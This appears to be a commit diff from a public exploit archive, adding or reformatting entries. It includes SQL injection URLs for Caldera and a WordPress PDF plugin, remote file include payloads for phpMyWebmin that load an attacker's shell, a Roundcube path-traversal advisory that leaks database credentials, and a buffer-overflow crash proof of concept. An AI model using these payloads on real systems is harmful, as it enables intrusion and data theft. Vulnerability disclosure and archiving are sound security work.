39238,platforms/php/webapps/39238.txt,"AtomCMS SQL Injection and Arbitrary File Upload Vulnerabilities",2014-07-07,"Jagriti Sahu",php,webapps,0
39239,platforms/php/webapps/39239.txt,"xClassified 'ads.php' SQL Injection Vulnerability",2014-07-07,Lazmania61,php,webapps,0
39240,platforms/php/webapps/39240.txt,"WordPress BSK PDF Manager Plugin 'wp-admin/admin.php' Multiple SQL Injection Vulnerabilities",2014-07-09,"Claudio Viviani",php,webapps,0
39242,platforms/windows/dos/39242.py,"NetSchedScan 1.0 - Crash PoC",2016-01-15,"Abraham Espinosa",windows,dos,0
39243,platforms/php/webapps/39243.txt,"phpDolphin <= 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,php,webapps,80
39244,platforms/linux/local/39244.txt,"Amanda <= 3.3.1 - amstar Command Injection Local Root",2016-01-15,"Hacker Fantastic",linux,local,0
39245,platforms/php/webapps/39245.txt,"Roundcube 1.1.3 - Path Traversal Vulnerability",2016-01-15,"High-Tech Bridge SA",php,webapps,80
39246,platforms/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection Vulnerability",2016-01-15,"High-Tech Bridge SA",php,webapps,80
39248,platforms/php/webapps/39248.txt,"WordPress BSK PDF Manager Plugin 'wp-admin/admin.php' Multiple SQL Injection Vulnerabilities",2014-07-09,"Claudio Viviani",php,webapps,0

Can't render this file because it is too large.

6
platforms/multiple/remote/705.pl
View file

@ -122,6 +122,6 @@ exit;
} else { print $answer; }
}
}
}
# milw0rm.com [2004-12-22]
}
# milw0rm.com [2004-12-22]

68
platforms/php/webapps/2451.txt
View file

@ -1,34 +1,34 @@
#######################################
+PHP MyWebMin 1.0 Remote File Include
+Advisory #5
+Product :PHP MyWebMin
+Develop:
+www.josh.ch/joshch/php-tools/phpmywebmin,download.html
+Vulnerable: Remote File Includes
+Risk:High
+Class:Remote
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################
Vulnerable File:window.php
$ordner = opendir("$target");
?>
and
include("$target/preferences.php");
if($action != "")
{
include("$action.php");
?>
Examples:
http://site/path/window.php?target=/etc
http://site/path/home.php?target=/home
http://site/path/window.php?action=Shell.php
# milw0rm.com [2006-09-28]
#######################################
+PHP MyWebMin 1.0 Remote File Include
+Advisory #5
+Product :PHP MyWebMin
+Develop:
+www.josh.ch/joshch/php-tools/phpmywebmin,download.html
+Vulnerable: Remote File Includes
+Risk:High
+Class:Remote
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################
Vulnerable File:window.php
$ordner = opendir("$target");
?>
and
include("$target/preferences.php");
if($action != "")
{
include("$action.php");
?>
Examples:
http://site/path/window.php?target=/etc
http://site/path/home.php?target=/home
http://site/path/window.php?action=Shell.php
# milw0rm.com [2006-09-28]

60
platforms/php/webapps/2462.txt
View file

@ -1,30 +1,30 @@
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
phpMyWebmin 1.0 <= (target) Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by XORON(turkish hacker)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
URL: http://www.josh.ch/joshch/joshch/_content_data/phpmywebmin/phpMyWebmin10.zip
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Vuln. Code: include("$target/$folder/preferences.php");
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit: /change_preferences2.php?target=http://SH3LL?
/create_file.php?target=http://SH3LL?
/upload_local.php?target=http://SH3LL?
/upload_multi.php?target=http://SH3LL?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx: str0ke, Preddy, Ironfist, Stansar, Kernel-32 ;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# milw0rm.com [2006-09-30]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
phpMyWebmin 1.0 <= (target) Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by XORON(turkish hacker)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
URL: http://www.josh.ch/joshch/joshch/_content_data/phpmywebmin/phpMyWebmin10.zip
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Vuln. Code: include("$target/$folder/preferences.php");
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit: /change_preferences2.php?target=http://SH3LL?
/create_file.php?target=http://SH3LL?
/upload_local.php?target=http://SH3LL?
/upload_multi.php?target=http://SH3LL?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx: str0ke, Preddy, Ironfist, Stansar, Kernel-32 ;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# milw0rm.com [2006-09-30]

7
platforms/php/webapps/39174.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/67256/info
Caldera is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/costview2/printers.php?id_onglet=0&tr=0+union+select+0x3020756E696F6E2073656C656374206E756C6C2C404076657273696F6E2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C,null,null,0,null&deb=0

11
platforms/php/webapps/39240.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/68488/info
BSK PDF Manager plugin for WordPress is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
BSK PDF Manager 1.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2
http://www.example.com/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2

17
platforms/php/webapps/39245.txt
View file

@ -18,9 +18,13 @@ Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.ht
Advisory Details:
High-Tech Bridge Security Research Lab discovered a path traversal vulnerability in a popular webmail client Roundcube. Vulnerability can be exploited to gain access to sensitive information and under certain circumstances to execute arbitrary code and totally compromise the vulnerable server.
High-Tech Bridge Security Research Lab discovered a path traversal vulnerability in a popular webmail client Roundcube.
Vulnerability can be exploited to gain access to sensitive information and under certain circumstances to execute arbitrary code and totally compromise the
vulnerable server.
The vulnerability exists due to insufficient sanitization of "_skin" HTTP POST parameter in "/index.php" script when changing between different skins of the web application. A remote authenticated attacker can use path traversal sequences (e.g. "../../") to load a new skin from arbitrary location on the system, readable by the webserver.
The vulnerability exists due to insufficient sanitization of "_skin" HTTP POST parameter in "/index.php" script when changing between different skins
of the web application. A remote authenticated attacker can use path traversal sequences (e.g. "../../") to load a new skin from arbitrary location on the system,
readable by the webserver.
A simple exploit below will send HTTP POST request to vulnerable script and will load a new skin from "/tmp" folder:
@ -44,7 +48,8 @@ A simple exploit below will send HTTP POST request to vulnerable script and will
Exploitation of the vulnerability requires valid user credentials and ability to create files on vulnerable host.
Using specially crafted skin for Roundcube, a remote attacker can gain access to potentially sensitive information. The following code in skin files will display database access credentials:
Using specially crafted skin for Roundcube, a remote attacker can gain access to potentially sensitive information. The following code in skin files will
display database access credentials:
<roundcube:var name="config:db_dsnw" />
@ -52,7 +57,8 @@ In case, when "skin_include_php" parameter is set to true, the attacker will be
$config['skin_include_php'] = true;
This vulnerability is difficult to exploit since it requires ability to create files on the web server and a valid Roundcube account. But this situation is very common for shared hosting servers, that host clients' websites on the same server as Roundcube.
This vulnerability is difficult to exploit since it requires ability to create files on the web server and a valid Roundcube account.
But this situation is very common for shared hosting servers, that host clients' websites on the same server as Roundcube.
-----------------------------------------------------------------------------------------------
@ -69,7 +75,8 @@ References:
[1] High-Tech Bridge Advisory HTB23283 - https://www.htbridge.com/advisory/HTB23283 - RCE in Roundcube
[2] Roundcube - https://roundcube.net/ - Free and Open Source Webmail Software
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------

11
platforms/php/webapps/39248.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/68488/info
BSK PDF Manager plugin for WordPress is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
BSK PDF Manager 1.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2
http://www.example.com/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2

6
platforms/php/webapps/673.cgi
View file

@ -63,6 +63,6 @@ print "[-] EXPLOIT BASARISIZ\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
}
print "</table></body></html>";
# milw0rm.com [2004-12-03]
print "</table></body></html>";
# milw0rm.com [2004-12-03]

27
platforms/windows/dos/39242.py Executable file
View file

@ -0,0 +1,27 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title : NetSchedScan v1.0 scan Hostname/IP Field Buffer Overflow Crash PoC
# Discovery by : Abraham Espinosa
# Email : hechoenmexicomx@hotmail.com
# Discovery Date : 14/01/2016
# Vendor Homepage : http://www.foundstone.com
# Software Link : http://www.mcafee.com/us/downloads/free-tools/netschedscan.aspx#
# Tested Version : 1.0
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows 8.1 x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python NetSchedScan.py
# 2.- Open NetSchedScan.txt and copy content to clipboard
# 3.- Open NetSchedScan.exe
# 4.- Clic button Ok
# 5.- Paste Clipboard Scan > Hostname/IP
# 6.- Clic on add button (->)
# 7.- Clic button Aceptar
# 8.- Crashed
buffer = "\x41" * 388
eip = "\x43" * 4
f = open ("NetSchedScan.txt", "w")
f.write(buffer + eip)
f.close()